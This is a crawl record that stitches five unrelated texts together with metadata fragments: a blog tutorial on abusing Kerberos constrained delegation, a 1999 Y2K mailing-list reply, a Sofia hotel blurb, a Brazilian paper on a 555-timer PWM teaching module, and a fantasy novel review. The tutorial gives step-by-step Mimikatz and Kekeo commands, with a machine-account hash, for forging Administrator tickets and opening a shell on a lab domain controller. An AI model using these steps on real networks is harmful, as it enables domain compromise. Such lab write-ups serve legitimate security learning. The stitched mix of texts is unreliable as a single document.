'<urn:uuid:0ed7e8d0-8bf6-437a-97d5-33b9fdc9eb13>', 'WARC-Target-URI': 'http://restorativejustice.org/rj-library/a-teen-court-evaluation-with-a-therapeutic-jurisprudence-perspective/3573/', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:20980781-f103-47e3-9e58-40e065b812c9>', 'WARC-Truncated': None}", 'previous_word_count': '153', 'url': 'http://restorativejustice.org/rj-library/a-teen-court-evaluation-with-a-therapeutic-jurisprudence-perspective/3573/', 'warcinfo': 'isPartOf: CC-MAIN-2019-18\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for April 2019\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-144-182-216.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.03120720386505127', 'original_id': '4d754646bc8cc8bad8fece5adb7381b196558da276ca72d5c2e5482daa46caf0'} |
Constrained Delegation to Shell
What is Constrained Delegation?
Note: this post assumes knowledge of Kerberos authentication mechanisms.
Constrained Delegation is a feature of Active Directory that allows access only to specified services on specified computers as an unauthenticated user. The unauthenticated user is essentially “impersonated” as an authenticated user for the purpose of accessing the service. For example say you have a webserver hosting a website that is connected to a file server and you want users with accounts on the webserver to be able to authenticate to the file server to retrieve data. One way would be to grant the web server permissions to the file server service and whenever a user requests access to the file server the webserver can access and retrieve the files. This would work but it is not very secure nor can permissions be provisioned for individual users. With constrained delegation, once a user logs into the website, the web servers service account will request access to the file server service on behalf of that user. This allows the user to get access to the content that they’ve been provisioned to, without having to provision any access to the web server’s service account itself. The protocol conversion process works like this:
1. User requests access to the file server
2. The Webserver service account requests a Ticket Granting Ticket(TGT) from the Key Distribution Center(KDC)
3. The KDC checks the webserver service userAccountControl has the “TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION” attribute set
4. The KDC checks that the user has not been blocked for delegation and then returns a forwardable ticket for the users account(S4U2Self)
5. The web service then passes this TGT back to the KDC and requests a Ticket Granting Service ticket(TGS) for the file server service
6. The KDC checks the web servers service has the msDS-AllowedToDelegateTo field to check if it is allowed to delegate to the file server service
7. If the file service is listed the KDC will return a TGS for the file service on the file server(S4U2Proxy)
8. The web service can now authenticate to the file server service (CIFS) on the remote file server as the user
If an attacker can gain local administrator privileges on a machine with constrained delegation enabled then they can create their own TGS tickets to the remote service on the remote machine and gain access. Constrained delegation was meant to provide security by constraining the delegation to only what has been provisioned but as you will see it is still possible to access other services and gain full access to the remote machine regardless of what services are enabled or disabled for delegation.
This diagram is a very simplified demonstration:
Enumerating Constrained Delegation
powershell script “powerview_dev.ps1” can be used to enumerate computers with constrained delegation enabled.
Once the script has been loaded into powershell run this command from a domain joined machine:
Get-DomainUser -TrustedToAuth
Highlighted in the image above are the attributes set that enable constrained delegation and what service on what remote host the system has access to. So if we can get administrator access on the computer “swepstop” then we will be able to create our own TGS using the NTLM hash of the swepstop$ machine account to access the CIFS(file system) on PWNLAB-DC01.pwnlab.local. Notice the useraccountcontrol and msds-allowedtodelegateto attributes.
Impersonating TGS tickets as any user
Gaining local administrator on the swepstop system is out of scope for this post. That falls under privilege escalation. Once administrator access has been gained on the system with constrained delegation enabled, Mimikatz can be used to extract the hash for the account that is trusted to auth for delegation. In this case it is the machine account swepstop$
So now that we have the hash of the account that is authorised to delegate we can request a TGT from the KDC. This is step 2 of the protocol conversion process listed at the beginning of this post. For this a tool called Kekeo is used. Kekeo is written by the same person that developed mimikatz. Run kekeo from your foothold machine and not the compromised constrained delegation machine.
tgt::ask /user:SWEPSTOP$ /domain:pwnlab.local /rc4:d3fc261f76ecb0bf7b2f851dc65fd3d6
We now have a TGT on disc:
"[email protected][email protected]"
Now that we have the TGT we can perform step 5 using the TGT to request a TGS for the service listed in the msDS-AllowedToDelegateTo attribute as any user. For an example I will use the administrator user. To recap, we are using the TGT to request a TGS as administrator for the CIFS service on PWNLAB-DC01.pwnlab.local. Using kekeo again:
tgs::s4u /tgt:[email protected][email protected] /user:[email protected] /service:cifs/PWNLAB-DC01.pwnlab.local
We now have a TGS as administrator to the CIFS service on PWNLAB-DC01:
"[email protected]@[email protected]"
At the moment we have the TGS on disc so we will not have access to the file server until the ticket is injected into memory. Again Mimikatz comes to the rescue.
Invoke-Mimikatz -Command '"kerberos::ptt [email protected]@PWNLAB.LOCAL_c[email protected]"'
Run klist to verify the ticket is in memory:
Now we can access the CIFS service on PWNLAB-DC01 as Administrator
Gaining a Shell
Ok so that’s all well and good having file system access but how does that get us a shell? Even though the constrained delegation is only configured to allow access to the CIFS service we can actually access any service that runs under the same account as CIFS. And what account does CIFS run under? The machine account. This gives us access to services like: LDAP, CIFS, HOST, WMI, HTTP and many others. The service to abuse to gain a shell is the HTTP service. Why? Windows inbuilt powershell tool for establishing remote sessions “Enter-PSSession” uses HTTP to create the remote sessions. So to gain remote access we need the TGS of the HTTP service on PWNLAB-DC01.
To request a TGS for the HTTP service we can simply request another CIFS TGS using the original TGT but this time pipe the HTTP service onto the end of the command.
This was the original command to request a TGS for the CIFS service:
This is the command with the HTTP service piped onto the end:
tgs::s4u /tgt:[email protected][email protected] /user:[email protected] /service:cifs/PWNLAB-DC01.pwnlab.local|http/PWNLAB-DC01.pwnlab.local
Now we have a TGS for HTTP on PWNLAB-DC01 as administrator. Notice the Alternate service name in the above image.
[email protected]@[email protected]_ALT.kirbi
Inject it into memory with Mimikatz
Invoke-Mimikatz -Command '"kerberos::ptt [email protected]@[email protected]_ALT.kirbi"'
Run klist to confirm the TGS is in memory
Create a session to PWNLAB-DC01:
Enter-PSSession -ComputerName PWNLAB-DC01.pwnlab.local | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '40', 'language_id_whole_page_fasttext': "{'en': 0.8500939607620239}", 'metadata': "{'Content-Length': '74541', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:CUFK6AXDLADN2VIMAUKXYAI7BVMFN7F3', 'WARC-Concurrent-To': '<urn:uuid:4bd6f20d-7921-47f2-926f-80b547385e07>', 'WARC-Date': datetime.datetime(2022, 11, 26, 23, 25, 58), 'WARC-IP-Address': '172.67.133.233', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:LGJCZSHKRE4YON4S7IMEHRM6YRAF6P32', 'WARC-Record-ID': '<urn:uuid:2e6f7328-ac2b-43d5-aa38-080a513a632c>', 'WARC-Target-URI': 'https://swepstopia.com/tag/windows/', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:33db11ef-7d24-4dbd-a8c0-ebbef6746c99>', 'WARC-Truncated': None}", 'previous_word_count': '1034', 'url': 'https://swepstopia.com/tag/windows/', 'warcinfo': 'isPartOf: CC-MAIN-2022-49\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for November/December 2022\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-67-67-28\r\nsoftware: Apache Nutch 1.19 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.4-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.13071376085281372', 'original_id': 'cf84d819b5601469881f33151c175301783865cba1f21beb8f0bdb0f7e79f529'} |
<< Previous Message | Next Message >>
From:"Todd Sherman" <>
Date:Fri, 6 Aug 1999 01:54:32 -0500
I cannot comment on the Y2K integrity of the Histonet server (Herb Hagler,
the administrator of this server could allay those fears), but I can say
that any computer is susceptible to the Y2K (abbreviated date code) bug. It
is also not restricted to the (both operating system and
applications) must be compliant as well. Your computer's BIOS (an
integrated master chip with fundamental instructions for your mainboard)
must be compliant too. The reason individual computers are more likely to
crash is because many are owned and operated by individuals who do not have
the resources/knowledge to test and/or correct the bug. A server,
especially a publicly accessed one, is likely administered by a
knowledgeable staff with funding to research and repair any errors that
arise. I don't want to alarm everybody because if your computer is a
relatively recent make, the Y2K bug has already been accounted for and the
proper hardware modifications made. I cannot give a cutoff date for when
computers became compliant because there are just too many manufacturers and
configurations to generalize. It would take some effort on the computer
owner/operator's part to confirm that all components are Y2K compliant.
Numerous utilities (i.e.. testing programs) exist that can evaluate the
status of a computer, and they can provide some idea of the extent of
susceptibility a computer might have to this bug. Otherwise, a phone call
or email to the manufacturer's support site may be in order. Most
(and...going out on a ledge here...probably all) new software is either Y2K
compliant or have a patch to repair the bug.
Hope this helps,
Todd S. Sherman
UT Southwestern Medical Center
Pediatrics/Neonatal Medicine
5323 Harry Hines Blvd.
Dallas, TX 75235
-----Original Message-----
From: Mike Kirby []
Sent: Friday, August 06, 1999 12:53 AM
Subject: Y2K
Greetings fellow Histonetters.
Being one from the "old school" and having been born "B.C" (before
computers), I hesitate to ask this question in case I am perceived to be a
dork, but is the Histonet server Y2K compatible? or is it only individual
computers that are likely to crash, come the year 2000?
Please allay the fears of the mentally challenged.
Mike Kirby
R.South Africa
<< Previous Message | Next Message >> | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '3', 'language_id_whole_page_fasttext': "{'en': 0.9048171043395996}", 'metadata': "{'Content-Length': '3505', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:HTDSFWGC6ZAH5OTDUHLN7V4ZN5CDA3KL', 'WARC-Concurrent-To': '<urn:uuid:7a59859c-00d1-417b-8998-11489670d308>', 'WARC-Date': datetime.datetime(2014, 8, 2, 4, 38, 37), 'WARC-IP-Address': '192.185.225.157', 'WARC-Identified-Payload-Type': None, 'WARC-Payload-Digest': 'sha1:P3ABNRLGAXMAD7B6BYC3MJPOF35ODWSA', 'WARC-Record-ID': '<urn:uuid:5e9c60e7-b937-42f2-9acb-cd876062a29d>', 'WARC-Target-URI': 'http://www.histosearch.com/histonet/Aug99/RE.Y2K.html', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:75adbcf4-79e2-406b-a285-f9e68219e3e5>', 'WARC-Truncated': None}", 'previous_word_count': '379', 'url': 'http://www.histosearch.com/histonet/Aug99/RE.Y2K.html', 'warcinfo': 'robots: classic\r\nhostname: ip-10-146-231-18.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2014-23\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for July 2014\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.023342013359069824', 'original_id': '12fc5252dd6f463d6fff57332437ea9d561621e2bc6d115e2bc0277403b122ec'} |
Brod Hotel
Brod Hotel
Situated in Sofia, this hotel is 0.5 mi (0.8 km) from Hristo Botev Sport Hall and within 3 mi (5 km) of Vasil Levski Stadium and National Palace of Culture. Winter Palace of Sports and Sofia Zoo are also within 1 mi (2 km). | mini_pile | {'original_id': 'f1890a99a85471fa2e3ab1c4bb8a7fd5413eefdd3483045e9074b8324447200a'} |
Brazilian Journal of Science, 2(8), 23-30, 2023. ISSN: 2764-3417 Brazilian Journal of Science, 2(8), 23-30, 2023. ISSN: 2764-3417 Resumo O uso da tecnologia tem se tornado cada vez mais viável nas salas de aula, em especial nas aulas de física. Explicar
os fenômenos relacionados à circuitos se torna mais simples quando podemos fornecer aos alunos exemplos
práticos. O presente artigo tem como objetivo descrever a construção de um módulo PWM de baixo custo, que foi
utilizado em sala de aula para demonstrar os princípios básicos da eletrônica digital. O módulo foi construído com
o circuito integrado 555 e mais alguns componentes. A montagem foi feita em uma protoboard. Os resultados
provenientes do funcionamento da placa foram analisados com um osciloscópio digital e corresponderam com o
esperado na teoria, a compatibilidade da largura dos pulsos pôde ser verificada com êxito, bem como o efeito da
simulação do sinal de saída analógico. Alternativamente o protótipo também foi utilizado com um motor elétrico
para visualização da influência da largura do pulso na rotação do motor. Palavras-chave: gerador PWM, circuito integrado 555, oscilador. Use of the 555 integrated circuit for the construction of a PWM
module Tiago Destéffani Admiral1
1 Physics Laboratory, Federal Institute of Education, Science and Technology Fluminense, RJ, Brazil
Correspondence: Tiago Destéffani Admiral. E-mail: tdesteffani@gmail.com Received: March 07, 2023
DOI: 10.14295/bjs.v2i8.348 Received: March 07, 2023
DOI: 10.14295/bjs.v2i8.348 Published: August 01, 2023 Published: August 01, 2023 Accepted: March 24, 2023
Pu
URL: https://doi.org/10.14295/bjs.v2i8.348 Uso do circuito integrado 555 para construção de um módulo PWM Uso do circuito integrado 555 para construção de um módulo PWM Abstract The use of technology has become increasingly viable in classrooms, especially in physics classes. Explaining
phenomena related to circuits becomes simpler when we can provide practical examples to students. The present
article aims to describe the construction of a low-cost PWM module, which was used in the classroom to
demonstrate the basic principles of digital electronics. The module was built with the 555 integrated circuit and a
few other components. The assembly was made on a breadboard. The results from the operation of the board were
analyzed with a digital oscilloscope and corresponded to what was expected in theory, the compatibility of the
pulse width could be successfully verified, as well as the effect of simulating the analog output signal. Alternatively,
the prototype was also used with an electric motor to visualize the influence of pulse width on the motor's rotation. Keywords: PWM generator, 555 timer integrated circuit, oscillator. 1. Introduction Access to technological resources and information on how to use them is becoming increasingly available. As a
result, it has become easy to better understand the inherent aspects of electronic circuits as well as to reproduce
circuits for our everyday use. This paper describes the construction of a didactic PWM module based on the 555 integrated circuit, using only a
few electronic components. The module was developed for didactic purposes, to help develop basic electronic
skills in students of the Physics course. Incorporating experimental activities in physics education often provides greater motivation to students. According
to Zúbia and Alves (2011) in their collection of remote experiments for physics and engineering, experimental
activities are essential to improve the learning of key concepts in science. The PWM (Pulse Width Modulation) circuit is a device capable of generating digital signals that simulate an analog
output. It basically has the function of generating high-frequency digital pulses, varying its width (pulse duration)
to produce an average voltage value. This average voltage value can be changed according to the pulse duration, 23 Brazilian Journal of Science, 2(8), 23-30, 2023. ISSN: 2764-3417 hence the name given to the circuit. hence the name given to the circuit. We can find various types of circuits to simulate the PWM signal, in some cases, such as in the work of (Silapam
and Siripruchyanun, 2009), where the authors built a current-mode PWM simulator circuit with only a single active
element. In the authors' work, the frequency relationship of the circuit was shown to be given by Equation 1 (Equation 1) (Equation 1) (Equation 1) In the circuit described by the authors, the frequency can be electronically controlled, and estimated by Equation
1 along with the other circuit parameters. Additionally, in the work of (Silapam and Siripruchyanun, 2009), we
also find a graph illustrating the PWM output signal, shown in Figure 1. Figure 1. PWM signal graph. Source: (Silapam and Siripruchyanun, 2009, p.146). Figure 1. PWM signal graph. Source: (Silapam and Siripruchyanun, 2009, p.146). The circuit that was built in this work resembles that of the authors in the sense that we obtained, as the output
result, the PWM signal that could be controlled to obtain different pulse widths. The circuit was used in the
classroom to simulate a voltage source, gradually increasing the rotation of a DC motor. 1. Introduction The main goal of the work
was to develop in the students the skills for assembling electrical circuits and improve the learning of physics
concepts related to circuits. 2. Materials and Methods The work was developed in a class of undergraduate physics students, composed of 5 students, at a Federal
institution in the state of Rio de Janeiro. The context of the work was in laboratory classes, and the students had
access to the experimental apparatus that will be described in this section. 2.1 The IC555 - Examples 2.1 The IC555 - Examples 2.1 The IC555 - Examples The 555 integrated circuit has three basic modes of operation: bistable, monostable, and astable. These operating
modes refer to the stability of the signal at the output of the 555. In the work of Admiral (2021a), for instance, we
find the construction of a vibration sensor based on the 555 operating in bistable mode. In this mode of operation,
the output of the integrated circuit remains at a low level until the contact with the trigger pin is triggered, only
then does the gate go to a high level and will remain so until someone resets the circuit. The circuit is shown in
Figure 2. 24 Brazilian Journal of Science, 2(8), 23-30, 2023. ISSN: 2764-3417 Figure 2. Example of circuit in bistable mode. (Admiral, 2021a, p. 89271). Figure 2. Example of circuit in bistable mode. (Admiral, 2021a, p. 89271). Another way to use the 555 is in monostable mode, in which the 555 has one of the logical levels of the output
signal as default, and the other mode is activated for a predefined time. In the work of Admiral (2021b), we have
an example of a circuit with the 555 in monostable mode. In this example, the circuit remains with its output at a
low logic level until an automatic float triggers the trigger pin, then the circuit changes the logic level of the output
to high, allowing the water pump to be activated, and remains in this state for approximately 1 minute, then returns
automatically to the low logic level. Figure 3 illustrates the circuit used by the author: Figure 3. Circuit using a IC555 in monostable mode. (Admiral, 2021b, p. 103818). Potentiometer
Float Figure 3. Circuit using a IC555 in monostable mode. (Admiral, 2021b, p. 103818). In the circuit shown in figure 3, in addition to the 555, there are several other components intended for the operation
of the board, which was designed to control an external load (electric motor) upon activation. Among the traditional
passive components (resistors and capacitors), we have the indication of the electronic float, which was the sensor
responsible for determining the activation. We also have a relay, intended for the electromechanical activation of
the motor, and a voltage regulator (7805) to adjust the output voltage of the 555 (currently 12V) to the 5.0V
compatible with the activation relay. 2.2 The astable mode The astable mode of operation causes the 555 to function as an oscillator, with the output signal turning on and off
alternately. Figure 4 shows the basis for the astable mode of operation. In the figure, we can see that the oscillation
frequency of the circuit depends on the set of resistors and capacitors associated with the 555 gates. In the same
figure, taken from the 555 datasheet, we can also see that the pulse width can be obtained using the expression
1.1RC. 25 Brazilian Journal of Science, 2(8), 23-30, 2023. ISSN: 2764-3417 Figure 4. Basic circuit in astable mode, main frame os function. Source: https://pdf1.alldatasheet.com/datasheet-
pdf/view/17972/PHILIPS/NE555.html Figure 4. Basic circuit in astable mode, main frame os function. Source: https://pdf1.alldatasheet.com/datasheet-
pdf/view/17972/PHILIPS/NE555.html Figure 4. Basic circuit in astable mode, main frame os function. Source: https://pdf1.alldatasheet.com/datasheet-
pdf/view/17972/PHILIPS/NE555.html In our prototype, the following components were used: In our prototype, the following components were used: - Timer Ne555; - 10k Resistor; - 10k Adjustable resistor; - 1,0 uF Eletrolitic capacitor; - 10 nF Capacitor; - 5,0V Source; - Breadboard; - Osciloscope. The assembly of the equipment, as well as the results obtained from the measurements, will be presented in the
next section. 3.1 Prototype measurements Next, we will address the results measured with the help of the prototype developed. The prototype was assembled
using a protoboard, also a voltage source providing 5.00V. The components were connected according to the
simplified circuit shown in figure 5: 26 Brazilian Journal of Science, 2(8), 23-30, 2023. ISSN: 2764-3417 Figure 5. Circuit used in class. Source: Author, 2023. The assembled circuit can be seen in Figure 6. Figure 6. On the right, the circuit assembled on the breadboard, on the left we can see the oscilloscope reading the
output signal. Source: Author, 2023. The two resistors that make up the circuit, along with the electrolytic capacitor, define the frequency of the signal, Figure 5. Circuit used in class. Source: Author, 2023. Figure 5. Circuit used in class. Source: Author, 2023. The assembled circuit can be seen in Figure 6. The assembled circuit can be seen in Figure 6. Figure 6. On the right, the circuit assembled on the breadboard, on the left we can see the oscilloscope reading the
output signal. Source: Author, 2023. Figure 6. On the right, the circuit assembled on the breadboard, on the left we can see the oscilloscope reading the
output signal. Source: Author, 2023. The two resistors that make up the circuit, along with the electrolytic capacitor, define the frequency of the signal,
as well as the duration of the high signal pulse. The percentage of time that the signal stays at the high logic level
is called Duty Cycle, in Figure 6 we can see the value of this parameter as approximately 68.7%. The two resistors that make up the circuit, along with the electrolytic capacitor, define the frequency of the signal,
as well as the duration of the high signal pulse. The percentage of time that the signal stays at the high logic level
is called Duty Cycle, in Figure 6 we can see the value of this parameter as approximately 68.7%. By directly measuring the resistance values with the students, we determined that the expected Duty Cycle value
would be 68.5%, very close to what was observed on the oscilloscope. The total frequency result was compared
with what we expected theoretically, given by equation 2. 27 Brazilian Journal of Science, 2(8), 23-30, 2023. 3.1 Prototype measurements ISSN: 2764-3417 (Equation 2) (Equation 2) Later, during class, it was demonstrated to the students that by turning the potentiometer, we can change the value
of one of the electrical resistances and, consequently, we can also change the duration of the high pulse. The
phenomenon was viewed in real-time on the portable oscilloscope. Another experiment that was performed consisted of connecting an electric motor directly to the output of the 555
and GND. As the electric motor has a nominal operating voltage of 6.0V, it worked perfectly with the small electric
current provided by the 555. Figure 7 illustrates the circuit now already connected to the electric motor. At the end
of the electric motor, a small piece of red tape was attached to help visualize the rotation of the motor shaft. Figure 7. We can see the motor spinning, connected to the PWM circuit. Source: Author, 2023. Figure 7. We can see the motor spinning, connected to the PWM circuit. Source: Author, 2023. At this point, the students were able to turn the potentiometer to observe how the pulse width influenced the
rotation of the motor. The larger the width, the higher the simulated average output voltage, on the other hand, the
smaller the pulse width, the lower the rotation of the electric motor. 3.2 Results in learning By monitoring the performance of the students throughout the classes, it was possible to identify some indications
that point towards an improvement in learning regarding the main concepts. Initially, all the students were willing
and attentive to the instructions for assembling the circuit. Three students even began to handle the components
and tried to insert them on the board before the command. This happened because they had received a printed copy
of the circuit diagram, so these students already had some knowledge and felt comfortable enough to take some
risks. However, they didn't get very far. The first difficulty appeared when they got confused about how the contacts
between the pins on the protoboard work. From that moment on, the teacher started a more practical explanation
about the components, such as identifying the value of resistors by the color code, identifying the contacts on the
protoboard, and, mainly, how to identify the pins of the 555. It was identified that the students did not know this
information at the beginning of the class, and by the end of the class, they already understood how everything
worked. 28 Brazilian Journal of Science, 2(8), 23-30, 2023. ISSN: 2764-3417 It is interesting to observe that throughout the class time, the students, even being few in number, interacted
collaboratively in the sense of helping each other to understand. According to Van der Veer, R. & Zavershneva
(2011), who explains about Vygotsky's learning theory, interaction and communication are essential pieces for
development and learning. At various moments, the teacher was not the one who answered the students' questions,
but their own classmates. The teacher's interference occurred mainly during theoretical doubts. Once the circuit assembly stage was completed, the students began to analyze the PWM pulse using the
oscilloscope, and doubts arose again. The oscilloscope used in the experiment is portable and much simpler
compared to the traditional one, but the students demonstrated difficulty in adjusting the ideal time scale to
visualize the PWM patterns. The teacher explained that first, we can estimate the expected frequency by doing the
calculations with equation 2, and then we adjust the oscilloscope to the ideal frequency range. At various moments, the students asked practical questions and arrived at conclusions that showed they were
understanding the concepts involved. 3.2 Results in learning At one point in the class, a student asked a question about how the inside of
the 555 works and how it functions the way we see it. At this moment, the other students also showed interest in
the topic, so the teacher spent a good amount of time in the class explaining about the internal voltage comparators
of the 555 and how they act to decide on the output pin state. The students found the ingenuity of the device quite
interesting. 8. Ethics Approval 8. Ethics Approval
Not applicable. Not applicable. 4. Conclusions Regarding the potential of the resource for learning, we can highlight some important points. Firstly, the students
had the opportunity to observe the components they study in theoretical classes up close; capacitors and resistors
were nothing more than symbols in books until then, but after the class they acquired the ability to recognize and
manipulate these components in the circuit. Another skill developed during the class involves reading and interpreting electrical signals from the oscilloscope. The oscilloscope was initially the device that presented the most difficulty in manipulation by the students. Replacing the bench oscilloscope with a portable one made the experiment more compact and simpler, both in
assembly and execution. The increase in interest and participation in classes observed during the use of the prototype agrees with other
works in the literature that make similar analyses, such as the example of Amusa's work (2021). In his work, the
author analyzes the importance of conducting experiments in the area of electricity to motivate and enhance the
learning of physics and engineering students. Finally, the experiment with the prototype proved to be a low-cost and easily accessible tool, very useful for
introducing basic concepts of electronics also for reinforcing concepts learned in previous disciplines. The
students' interest in experimental classes, although difficult to be measured numerically, is noticeably higher than
in traditional theoretical classes. This point alone justifies bringing experiments to the classroom. Admiral, T. D. (2021a). Using the 555 integrated circuit in bistable mode as a vibration sensor. Brazilian Journal
of Development, 7(9), 89266-89275. 10.34117/bjdv7n9-202. 7. Conflicts of Interest No conflicts of interest. 5. Acknowledgments Special thanks to the laboratory of the Physics and Physics Teaching Research Group at MNPEF, IF Admiral, T. D. (2021b). Automated water capture system with Ne555 in monostable mode. Brazilian Journal of
Development, 103814-103823. 10.34117/bjdv7n11-144. 9. References Admiral, T. D. (2021a). Using the 555 integrated circuit in bistable mode as a vibration sensor. Brazilian Journal
of Development, 7(9), 89266-89275. 10.34117/bjdv7n9-202. Admiral, T. D. (2021b). Automated water capture system with Ne555 in monostable mode. Brazilian Journal of
Development, 103814-103823. 10.34117/bjdv7n11-144. 29 Brazilian Journal of Science, 2(8), 23-30, 2023. ISSN: 2764-3417 Amusa, J. O. (2021). Practical electronics as a tool for enhancing physics students’ interest in learning the concept
of electricity in Lagos, Nigeria. International Journal of Educational Research Review, 7(2), 88-98. https://doi.org/10.24331/ijere.1029589 Employing Only Single Active Element. (2010). Proceedings of the 1st International Conference on Technical
Education (ICTE2009) January 21-22, 2010, Bangkok, Thailand. Silapan, P., & Siripruchyanun, M. (2009). A simple current-mode PWM signal generator employing only single
active element. In: Proceedings of the 1st International Conference on Technical Education (ICTE 2009),
January
21-22,
2010,
Bangkok,
Thailand. https://citeseerx.ist.psu.edu/document?repid=rep1&type=pdf&doi=f4bf2fb76aaa91c91f2531f1f65970d222d
41776 Silapan, P., & Siripruchyanun, M. (2009). A simple current-mode PWM signal generator employing only single
active element. In: Proceedings of the 1st International Conference on Technical Education (ICTE 2009),
January
21-22,
2010,
Bangkok,
Thailand. active element. In: Proceedings of the 1st International Conference on Technical Education (ICTE 2009),
January
21-22,
2010,
Bangkok,
Thailand. https://citeseerx.ist.psu.edu/document?repid=rep1&type=pdf&doi=f4bf2fb76aaa91c91f2531f1f65970d222d
41776 Thailand. January
21 22,
2010,
Bangkok,
Thailand. https://citeseerx.ist.psu.edu/document?repid=rep1&type=pdf&doi=f4bf2fb76aaa91c91f2531f1f65970d222d
41776 Van der Veer, R., & Zavershneva, E. (2011). To Moscow with love: Partial reconstruction of Vygotsky's Trip to
London. Integrative Psychological and Behavioral Science, 45(4), 458-474. https://doi.org/10.1007/s12124-
011-9173-8 Zúbia, J, G., & Alves, G. R. (2011). Using remote labs in education: Two little ducks in remote experimentation. Deusto Digital. University of Deusto, ISBN: 978-84-9830-398-8. Zúbia, J, G., & Alves, G. R. (2011). Using remote labs in education: Two little ducks in remote experimentation. Deusto Digital. University of Deusto, ISBN: 978-84-9830-398-8. Copyrights Copyright for this article is retained by the author(s), with first publication rights granted to the journal. py g
y
( ),
p
g
g
j
This is an open-access article distributed under the terms and conditions of the Creative Commons Attribution
license (http://creativecommons.org/licenses/by/4.0/). 30 | common_corpus | {'identifier': 'https://openalex.org/W4363675716', 'collection': 'OpenAlex', 'open_type': 'Open Science', 'license': 'CC-By', 'date': '2023.0', 'title': 'Use of the 555 integrated circuit for the construction of a PWM module', 'creator': 'Tiago Destéffani Admiral', 'language': 'English', 'language_type': 'Spoken', 'word_count': '3197', 'token_count': '5115', '__index_level_0__': '6059', 'original_id': '68dff4c006c646676c03e5f0dc3370c1cfb1891e46a96e62ca3a603f56ce982f'} |
Review: The Unbroken (Magic of the Lost #1) by C.L. Clark
Rating: 10/10
Thank you to Nazia, Orbit Books, for providing me an ARC to review this book. All opinions are just that, my opinion.
This review contains minor spoilers so you read at your own risk.
This is a gut-wrenching debut full of stories long forgotten. That have been buried under the sands. You will witness stories of betrayal, characters being forced to do actions they don’t like, characters that have a strong sense of loyalty to their families. That dear reader, is what this story tells you. A wonderful yet tragic tale at the same time. It is a story that exposes the brutality of colonialism and oppression bringing the harsh reality of life under colonial rule in over five hundred pages is not only just a glimpse, just a viewpoint. No. It is an achievement. I am so impressed with the way this novel has been written. It takes a lot of time, though, and process to not only understand what was the motives behind colonialism but to also illustrate this with magic, gods and so many cultural influences from the Berbers to the Algerians, to Arabian style tribes and I could hint a detection of Ancient Egyptian influences. This is a novel in 2021 that has to be read. I am telling you, the amount of betrayal and trickery one has to go through to read this novel, to witness the characters Touraine and Luca embark on a journey of self-discovery, hurt, and pain to finally realize that all of this conflict, is in the end for nothing.
I studied French Colonial History and I especially studied Algeria during that time. So from one student of this subject to another, I applaud you, C.L Clark. You’ve done your work. You’ve done your research. You’ve shown the rich culture that North Africa has had on the European World which has been often ignored. Carthage had a massive influence when it ruled Spain and North Africa until it came to war with the Roman Republic. Then came the Numidians who had helped the Romans against Hannibal, only to find that their payment for their loyalty was their destruction. Then came the Roman rule of North Africa for centuries until the break up of the Western and Eastern Roman Empires and the arrival of Islam into North Africa, which then included the Maghreb and which the Ottoman Admiral, Piri Res would establish his mark over there, and then, of course, the Barbary Pirates, the Ottoman Empire’s influence. This amount of history in itself is to draw attention to the fact that I could draw many comparisons too. But North Africa is a perfect setting for fantasy and I am so glad C.L Clark chose French North Africa as a subject on to base her fantasy. (Plus she’s studied the subject so kudos. Well done). French Colonial Rule is a conundrum in and by itself in many aspects. On the one hand, they did for some time agreed to listen to their colonial subjects, but then took those concerns away, and established the main axis of power within the French settlers that were outnumbered by their Algerian/Vietnamese native populations. The Balladarians are pretty much like that, in many senses. They take all the best positions, shops, merchants you name it. The Qazali don’t get much for it in return. It’s a pretty raw deal if you ask me.
Do you want to see how this all works? Let me summarise it in a way that will keep track of the world events to not spoil the whole story. Touraine was a child that lived in the Shalan Empire. The Balladarian Empire comes in and conquers it. Now Touraine arrives back into her native lands, as a part of a regiment called the Sands. The Sands, however, are just cannon fodder. They’re just there to be sent into battle with no consideration. They are educated in the Balladarian way yes, they may talk and speak like Balladarians, but they are not true Balladarians. The Balladarians don’t see them that way. Especially General Cantic. And boy, is she the most difficult character in this book. A woman that is suited for power, I don’t think she even needed to be in this land. She needed to be back in Balladaria securing power for herself. That is what I felt. She is supremely one of the most brilliant grey characters you will come across in this book. Difficult to deal with. But then again, she’s leading one of the most dizzying experiences. She has to deal with riots, rebellions, and deal with the usurpation of power. But she’s exactly the type of general that if I were an Emperor, I would not want her to be my enemy. She is, of course, having tendencies of disloyalty. And too much loyalty can be bad sometimes now, can’t it?
